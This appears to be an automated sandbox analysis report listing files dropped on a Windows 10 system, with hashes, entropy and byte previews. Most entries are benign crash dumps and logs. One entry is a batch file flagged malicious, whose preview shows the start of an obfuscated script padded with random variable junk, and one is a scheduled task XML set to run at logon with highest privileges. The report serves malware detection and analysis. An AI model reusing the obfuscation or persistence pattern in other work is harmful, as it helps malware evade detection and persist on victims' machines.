                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527276" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 14:23:31 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):916504
                                                Entropy (8bit):3.470274057164105
                                                Encrypted:false
                                                SSDEEP:6144:wZq58Rtx0E6JZ3R0FqoRy9grd5y+jLnKoOtZoSqOpo3Qqn/:5NPR0Fq8Aod5y+jTY0SqacQq/
                                                MD5:56EE3F9EC63B143C58854E33EE043CD2
                                                SHA1:41815B5B4389BA871DFAA7C029C2E80FB62667F3
                                                SHA-256:2B2D66AC33D54FA7CC5D408EE64BBD43350729EA1F13B3F7C1B9CCB4CE80257F
                                                SHA-512:C30CA76BACFB51C5DE55B8C8240231D0EF51A88AA7BDBAA89745CA1CD2A085A2FF06AFCDABE8D3CE14D4D3D10A121483CA0EECBA00B8458E41972D053F3B92C1
                                                Malicious:false
                                                Preview:MDMP..a..... .........f............T............'..h........4...3..........|...........`.......8...........T............^...............g...........i..............................................................................eJ......tj......Lw......................T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8584
                                                Entropy (8bit):3.6942176814285483
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ8aRv6YzrlgmfZaPKpWEL89bRIefH7m:R6lXJZZ6Y/lgmfQP/RZfS
                                                MD5:55E027AFCCCAA4E1165C7AA43BBF3359
                                                SHA1:36CB56452625D2377EC8C8A8CD7191ACE4151E74
                                                SHA-256:06D84E831BFDBA2B5D6E15B190027C6756066C9E351E9B075B619C1945F58EAC
                                                SHA-512:B8E0D1EE1CCF0A7EE9D204AAC27F620021FA04FAF1EC4BB183DD359DD6E387B2365AF34089BEF1ABD887083886FFA068A864CC830BB132AEE45BFEED0D76EDD8
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.6.0.<./.P.i.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4777
                                                Entropy (8bit):4.441389444143406
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zseSJg771I9fMWpW8VYJYm8M4JQ9wSFCyq8vlwXytfFd:uIjfhI7El7V1JQGRWuXufFd
                                                MD5:B20E0BEA9BE8A572E0D33BD6E305C8C4
                                                SHA1:039DBEE5E482D342AE1F554EFC9C36A288CF2DFD
                                                SHA-256:1AFB53A1314FB267E9068718DAB923BD3C7B6B5765F94FBF506FE82ED1BBABAC
                                                SHA-512:AF6C3EA8070B56423CD6AE8ECF80181CC439ECB859BF900FBF2622AF8D1BA491472A6C5EBA0E129E04669769782954AB8BBF77673BB96D614A42F60B987613EE
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527366" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):9713
                                                Entropy (8bit):4.940954773740904
                                                Encrypted:false
                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                                MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                                SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                                SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                                SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                                Malicious:false
                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2916
                                                Entropy (8bit):5.381082842927869
                                                Encrypted:false
                                                SSDEEP:48:44AzsSU4YymI4RIoUeCa+m9qr9t5/78NfpH4Gx3axIZVEouNHJBVrH/jCB:rAzlHYvIIfLz9qrh7KfpRjPEo2dL8
                                                MD5:F4BE5980A714908EBBA01125181DF32D
                                                SHA1:EA12BA3B091CB0F1035196820276A55A435A13E3
                                                SHA-256:2D90AFF66CF3D74DCD85194EE98C76597CE6649C7047FF8A94E02E1CA4C64233
                                                SHA-512:74336A0095EFDF698363BF3B859C112E96AC7322254B5CCE28C249D2903FF05048BA1E7493F69B1C29C6F0337D53EBAF7321ECBB5CC12A9006D3FFB66BF9EB53
                                                Malicious:false
                                                Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):352
                                                Entropy (8bit):7.396909983796798
                                                Encrypted:false
                                                SSDEEP:6:TuRXpThPWQJlAAEjCAnWkM599qCRI9srr6iQnyEmppei1cjTipHibUkAVBn:TuRXpTJlAlCAnWvJRIqiiS9m6i1cjTqp
                                                MD5:0A49242CA7150F19F0BFC2F5337C5999
                                                SHA1:CF5BFD94D2E2609A6CE1F8B4ED4E70AC0385CAC3
                                                SHA-256:E531C82D09EF1E0581054E03888A36937E1C3D916E630011EFDC14B342FC3C2B
                                                SHA-512:484BCC7105BFE4794045F540ED12FDB40C32B44BBEF9477534A041FDAB6228276B5482E857892A7AAC422D97BD51F0CC73B85BC748B44A1C221333C223EC6C74
                                                Malicious:false
                                                Preview:MY...U:.1.............L.p.O.Y.s]//<k. ...i...v_.^.R....^}.Q.S..S)...9oh....3gG..2BO.(T'e..ql*.xA.p.@...I.HG@....%=Kj.l..+`c...$R..W..WSV...7..C..%....X..i......e9....5B.....{m.Yi.K......ufH..K...$0BU....J.0F,...c..e. ..r...U9..:...lX...k........;....[o...= $V..I(k....j...-f^...Y3.G.t..L4J...}...1./....?#".Z...b..r..E..uY...e....L...y.1.
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):5214429
                                                Entropy (8bit):6.008710946572079
                                                Encrypted:false
                                                SSDEEP:49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
                                                MD5:19FC666F7494D78A55D6B50A0252C214
                                                SHA1:8876CD520507CBFDC2E89E449BABA52232A1DF1B
                                                SHA-256:E96F8F61E3AF77C429AE6AF54C128F7B8420A45A0A63BDFCACD682773B8E5FC1
                                                SHA-512:94DDE8D5D0100E892CA004556B30B8E8FEDACC1E3482DAB9D611BD64569B2F73E29DA93DB2C7AE51585791A4F39D01426EE6663C48602DE92AA74F6EBE3F630A
                                                Malicious:true
                                                Preview:@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJqyhiYGVWNKJRrYodYeEjAsbrOpYYCWmpWWBUAVhPcsRZmXzGSNYAyIjYxQuJIWtQytUuwtCdXPgiBbfQPsgPYLQoND%%^%c%KAygfZaASdfjylUCJBawwLDTqQERMDGGSXRCzJbjAAmNKiHDdjhNMhaZXEPovjOowyrBurdazRWVyQjijaODwTTLWSFVTMOrMXrlRgiLfhnVkfAguHfuukSCEFECMihNdFjAzXrcScyoGYARryAlGtWBeOHlCGZWZzSF%%^%h%aHwqdBsMDWGeNlnHVgJJHvLqgAmcBpgfVUrReUDSDPARbgOvMpdsjVoEWgkCpqloPAjSTwDbCRfSUToZMRqmlOWZFNUYKaCnDmcBXVBqMcPrQwJdRkQyaZdbDjmgBEqBoSoIRNcQpZAiYEjjeRhzkdnEiaYNIuPhLndYialehajazVdYZdcKxRrlEJAQPohUkswKBlbdFcrjUmfm%%^%o%ZOFseJUWRtyzvoSSoPgytwOcYeuzhqsDnTPACCfIBNJRCEkNyqGwZODCZDtaouOBaVlBzsqLKxWFMWAuUGaQKVEzpmAYjfuhZiRHsIogaUMBRYQddYfIuXRfqMmmRrCEdPFEfSclsUQPjcIrwxVkZLNcrLqFwcoIshybslYkWUpzgcVodVQuvsFrcDntCwPqFixbDHYkzLnfvnWpPb%%^% %BmUmZChYPYEHAeZTXEULwWFVKezVPHYDAUndLWxzwIilUdNawt
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):3488
                                                Entropy (8bit):3.587684480817152
                                                Encrypted:false
                                                SSDEEP:48:yei1q97rQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXCc0:tYnkp2Gdi3ipVA9ll7EhAMz3cHtr+
                                                MD5:5963A0A8B46820D708D44DFD2F7535A8
                                                SHA1:1475C521CACC23389C7AD3CCEDDFAE570BAA2F50
                                                SHA-256:889D9CB2BEA33BA5A786B6BFF31773A50D886477B365D29AADC09E74F60FF1A0
                                                SHA-512:3668FB1EC21C53F0B9A0236CF7FC9B8FB085E65447F58F53A112513DBEA3E9184C73728A529DF1791E9331C188FA4CBB14F5BA0790EDDACEBD00AFF0643C784E
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.3.T.1.0.:.4.2.:.0.9...9.6.3.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.9.p.d.B.1.a.H.K.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):67544
                                                Entropy (8bit):3.996029735699618
                                                Encrypted:false
                                                SSDEEP:768:mpfuflfofzwAbP5AAKP5qf5AKP5dfvoXfSPfm4fGfuszpfn8:wvbPNKPTKP3GbzF8
                                                MD5:F6B6DC892A6FADBDD0D457B3D2E18FE6
                                                SHA1:A99CB936472DB4D03F63C60EAE26C4CB35FBBDA4
                                                SHA-256:C1316854E3DAE56FE75CDB1CE50E2EF4E8B0EBD76BC92D2C44A980E9BFF276AF
                                                SHA-512:C36958A263C81622E435D63409D07AB96B281E387FFEF195A011786FD98461C36C69BA01DC485F62D07E50AF1CFEDAB05758FF2AF152F2DB8F861BF2AA5F65A6
                                                Malicious:false
                                                Preview:ElfChnk.................E.......M................"...]v......................................................................j..............................................=...........................................................................................................................g...............@...........................n...................M...]...........................p...............&...............................................................&.......................................**......L.....................d.)&.....................................................................................!...d............................L..............w.)Cp...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.a.a.b.7.f.3.6.c.3...1.6.8.0...0.1.d.b.1.5.9.f.c.f.3.2.0.4.d.8...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.9928051740316333
                                                Encrypted:false
                                                SSDEEP:768:FVUHiapX7xadptrDT9W84Gq4dGnMltZtgcrO:sHi6xadptrX9WP+g
                                                MD5:7941FD55905829E32067290DE281ADA9
                                                SHA1:F78C8A4F8D64155C258FB28E6F673CB2831A03C3
                                                SHA-256:ECD4A3DB4E85D7508FE8EF659C2175A0E40F521CCABFA985776C6771CC362411
                                                SHA-512:C7D345075F3A25FFA021E6E52F7B79EC22C9E61B64172F13733104C3B8488D87B5143ADE49A891E883F12C7ED0E55B8C2943B021C140B25A26F669B963184D38
                                                Malicious:false
                                                Preview:ElfChnk.........M...............M..........................................................................................`.~.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.396148699263237
                                                Encrypted:false
                                                SSDEEP:384:jhONk2SCNCrN0KNoBNoiNKNosaNjN4N9NRNCN8NoNjNUNONXN6N6LNvgN1NkNWzP:jgS5itAsZ2DCIEzVFNtPp
                                                MD5:1714E9F375BF402E9FF7644ED82EC285
                                                SHA1:ECB3A4495CEBE4F270C8D94553F027A36F50C42B
                                                SHA-256:20C6A11A8C455A4E4077CC61001BED7C0DD4E6F4FAADBCAD8DDF9A31406F1051
                                                SHA-512:A376B10C14E4EF653991874DE0D730768CC8D9BD49D8C348EED40CD184DA0C2AB47022B0AF6841B0F260598927C63271550A9B2C30F6A0DB1F6A3F830FC16576
                                                Malicious:false
                                                Preview:ElfChnk.v...............v...................p.......T..q......................................................................D&................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................}.......................}.......................&...M.......M...........................}...................m...................**......v........^.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.291472434779734
                                                Encrypted:false
                                                SSDEEP:384:dhpVAVqVjVWVscVcVtVrV51VgVTV/VZVXKVNVjVyVlF/vVIVtVQVwVEV+VpVIVYQ:db8xf4BsuMgkMu4Ht
                                                MD5:0D17D3FE0C679FE879B0135A8F665F86
                                                SHA1:2CC53BA3D81A3E640649F7BB609499DED7C76429
                                                SHA-256:A761DC30DD507B19E97BF45684432B8388C3662B30EACD1D85F7FDEA6D9700F9
                                                SHA-512:75D1EBC29F7589ECD0D19D02657D95BB7328FB3772D480ED269D3B130FB2400DFFCC68155CC34D996AA9BFD9ED46891AA0E18ABF08100CDB9150FF86C906A6CE
                                                Malicious:false
                                                Preview:ElfChnk.........A...............A..................to.....................................................................\.Y6................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F....................................................'..............&.......................................................................%......**..................`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.4171477781140895
                                                Encrypted:false
                                                SSDEEP:384:4EhImkmAymRvmVkcmhTiYmBmgmUmWmBmbm4my7mcEZmZmtmZ4mRmKmdm5mqmmmW5:4ExkrTiZz+9hZ/97TSPnSKn
                                                MD5:019DF127D51AF46390648C77E49472B0
                                                SHA1:6EB98EDEB65C54F56450A0C9D16421FE47049E92
                                                SHA-256:1989B8954894614B6A075BFFD6A7970545DE3E02996349BBCBF5E8120499A5A9
                                                SHA-512:0635DE7DA2B17185E4EE0F9DD876BF61E3DBD0079BB8C499AA50E646626E40BB1EF213BA61FD84171F4825D063BE70F97548C9C46B699DAB0918B3505A067187
                                                Malicious:false
